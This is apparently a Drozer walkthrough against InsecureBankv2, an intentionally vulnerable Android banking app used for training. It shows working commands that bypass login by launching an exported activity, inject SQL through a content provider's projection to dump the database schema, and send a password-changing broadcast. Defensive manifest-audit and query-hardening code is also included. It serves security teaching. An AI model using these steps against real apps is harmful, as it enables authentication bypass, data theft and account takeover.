Using Drozer for Analysis

https://github.com/ReversecLabs/drozer → Download Drozer.

We can use Python 3 (pip) to install Drozer from the downloaded wheel:

pip install C:\Users\secsh\Downloads\drozer-3.1.0-py3-none-any.whl

Add it to the PATH environment variable so it is easier to use.

Install the Drozer agent on the emulator.

Once installed, turn on the agent's embedded server.

Next, set up port forwarding between your PC and the emulator (the command is shown in the original screenshot). This lets Drozer on your PC talk to the agent on the emulator without needing the emulator's IP address.

Basic Usage

run app.package.info -a com.android.insecurebankv2

First, check the app's attack surface:

run app.package.attacksurface com.android.insecurebankv2

We can see that:

  • 5 activities exported → These are screens (Activities) in the app that other apps could start without restriction. Exported activities are often attack vectors.
  • 1 broadcast receiver exported → A receiver that listens for system or custom intents from other apps. It could be abused if not protected by a permission.
  • 1 content provider exported → A data-sharing component that other apps can query or modify. It needs proper read/write permissions.
  • 0 services exported → No background services are exported, so there is less risk there.
  • is debuggable → The app is marked as debuggable, which makes it easier to attack (you can attach a debugger, access private data, etc.).
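The attack surface Drozer reports comes straight from the app's manifest. As an added example (not part of the original post or of Drozer), the following script audits a constructed manifest fragment, modelled on the findings above under a hypothetical package name, and flags exported components that require no permission plus the debuggable flag, so a developer can catch the same issues before shipping:

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def android_attr(attr):
    """Qualified name of an android:* attribute for ElementTree lookups."""
    return f"{{{ANDROID_NS}}}{attr}"

# Constructed manifest fragment (hypothetical package, modelled on the attack surface above).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.bank">
  <application android:debuggable="true">
    <activity android:name=".PostLogin" android:exported="true"/>
    <activity android:name=".LoginActivity" android:exported="true"
              android:permission="com.example.bank.LOGIN"/>
    <receiver android:name=".MyBroadCastReceiver">
      <intent-filter><action android:name="theBroadcast"/></intent-filter>
    </receiver>
    <provider android:name=".TrackUserContentProvider"
              android:authorities="com.example.bank.TrackUserContentProvider"
              android:exported="true"/>
    <service android:name=".SyncService" android:exported="false"/>
  </application>
</manifest>"""

def is_exported(elem):
    """android:exported wins; if unset, a component with an intent-filter is exported
    by default on targets below API 31 (API 31+ requires an explicit value)."""
    exported = elem.get(android_attr("exported"))
    if exported is not None:
        return exported.lower() == "true"
    return elem.find("intent-filter") is not None

def audit_manifest(xml_text):
    """Return the debuggable flag and every exported component with no permission at all."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    findings = {"debuggable": app.get(android_attr("debuggable")) == "true", "unprotected": []}
    for elem in app:
        if elem.tag not in ("activity", "receiver", "provider", "service"):
            continue
        if is_exported(elem):
            # Providers may rely on readPermission/writePermission instead of permission.
            perms = [elem.get(android_attr(p)) for p in ("permission", "readPermission", "writePermission")]
            if not any(perms):
                findings["unprotected"].append((elem.tag, elem.get(android_attr("name"))))
    return findings
```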

Exploiting Activities

run app.activity.info -a com.android.insecurebankv2

Each line shows an activity name and its required permission.

  • Permission: null → No permission is required, so any other app could start these activities.
  • Activities like DoTransfer or ViewStatement are especially sensitive because, if exploited, they could allow money transfers or data viewing without authentication.

Before we run any command, we can see that InsecureBank is not logged in yet.

Let’s exploit the PostLogin activity:

dz> run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin
Attempting to run shell module

After starting the activity directly, we are logged in without ever entering credentials.

Exploiting Content Providers

This app’s TrackUserContentProvider is completely unprotected.

dz> run app.provider.info -a com.android.insecurebankv2
Attempting to run shell module
Package: com.android.insecurebankv2
  Authority: com.android.insecurebankv2.TrackUserContentProvider
    Read Permission: null
    Write Permission: null
    Content Provider: com.android.insecurebankv2.TrackUserContentProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False

Any other app could:

  • Query sensitive data (user info, transactions, etc.)
  • Insert or modify records
  • Potentially compromise the app’s logic

We can find some accessible content URIs:

dz> run scanner.provider.finduris -a com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
No respone from content URI:      content://com.android.insecurebankv2.TrackUserContentProvider/
Got a response from content Uri:  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
No respone from content URI:      content://com.android.insecurebankv2.TrackUserContentProvider
No respone from content URI:      content://com.google.android.gms.games
Got a response from content Uri:  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
No respone from content URI:      content://com.google.android.gms.games/

For sure accessible content URIs:
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

We can check whether these URIs are vulnerable to SQL injection:

dz> run scanner.provider.injection -a com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
Not Vulnerable:
  content://com.android.insecurebankv2.TrackUserContentProvider
  content://com.android.insecurebankv2.TrackUserContentProvider/
  content://com.google.android.gms.games
  content://com.google.android.gms.games/

Injection in Projection:
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

Injection in Selection:
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

Below is the basic query syntax:

dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
Attempting to run shell module
| id | name |

We can then inject manually; for example, to dump the database schema from sqlite_master via the projection:

dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/ --projection "* FROM sqlite_master; --"
Attempting to run shell module
| type  | name             | tbl_name         | rootpage | sql                                                                            |
| table | android_metadata | android_metadata | 3        | CREATE TABLE android_metadata (locale TEXT)                                    |
| table | names            | names            | 4        | CREATE TABLE names (id INTEGER PRIMARY KEY AUTOINCREMENT,  name TEXT NOT NULL) |
| table | sqlite_sequence  | sqlite_sequence  | 5        | CREATE TABLE sqlite_sequence(name,seq)                                         |
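The projection injection above works because the provider splices the caller-supplied projection and selection straight into its SQL. As an added example (not code from the original post, from InsecureBankv2 or from Drozer), the snippet below rebuilds the dumped schema in an in-memory SQLite database, reproduces the vulnerable query pattern, and shows a hardened version that allow-lists projection columns and only accepts parameter-bound selections:

```python
import re
import sqlite3

# Constructed in-memory copy of the schema shown by the sqlite_master dump above.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE android_metadata (locale TEXT);
        CREATE TABLE names (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT NOT NULL);
        INSERT INTO names (name) VALUES ('dinesh'), ('jack');
    """)
    return db

def vulnerable_query(db, projection, selection=None, selection_args=()):
    """Mirrors a provider that splices the caller's projection and selection into SQL."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM names"
    if selection:
        sql += f" WHERE {selection}"
    return db.execute(sql, selection_args).fetchall()

ALLOWED_COLUMNS = {"id", "name"}
# Only "col = ?" clauses joined by AND; the values must arrive through selection_args.
SELECTION_RE = re.compile(r"^\s*(id|name)\s*=\s*\?(\s+AND\s+(id|name)\s*=\s*\?)*\s*$", re.I)

def hardened_query(db, projection, selection=None, selection_args=()):
    """Allow-lists projection columns and constrains the selection to bound parameters."""
    if not projection:
        projection = sorted(ALLOWED_COLUMNS)
    bad = [c for c in projection if c not in ALLOWED_COLUMNS]
    if bad:
        raise ValueError(f"rejected projection column(s): {bad}")
    sql = f"SELECT {', '.join(projection)} FROM names"
    if selection:
        if not SELECTION_RE.match(selection):
            raise ValueError(f"rejected selection: {selection!r}")
        sql += f" WHERE {selection}"
    return db.execute(sql, selection_args).fetchall()
```

On Android the equivalent hardening is a projection map or column allow-list plus SQLiteQueryBuilder with strict mode, rather than a hand-written regex.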

Exploiting Broadcast Receivers

Any app, including a malicious one, can send an intent with the theBroadcast action and trigger MyBroadCastReceiver, because no permission protects it:

dz> run app.broadcast.info -a com.android.insecurebankv2 -i
Attempting to run shell module
Package: com.android.insecurebankv2
  com.android.insecurebankv2.MyBroadCastReceiver
    Intent Filter:
      Actions:
        - theBroadcast
    Permission: null

Check the receiver's code in jadx to see which intent extras it reads.

Knowing from jadx which extras the receiver expects, we can send the broadcast like so:

dz> run app.broadcast.send --action theBroadcast --extra string phonenumber 5554321 --extra string newpass Hello!@#
Attempting to run shell module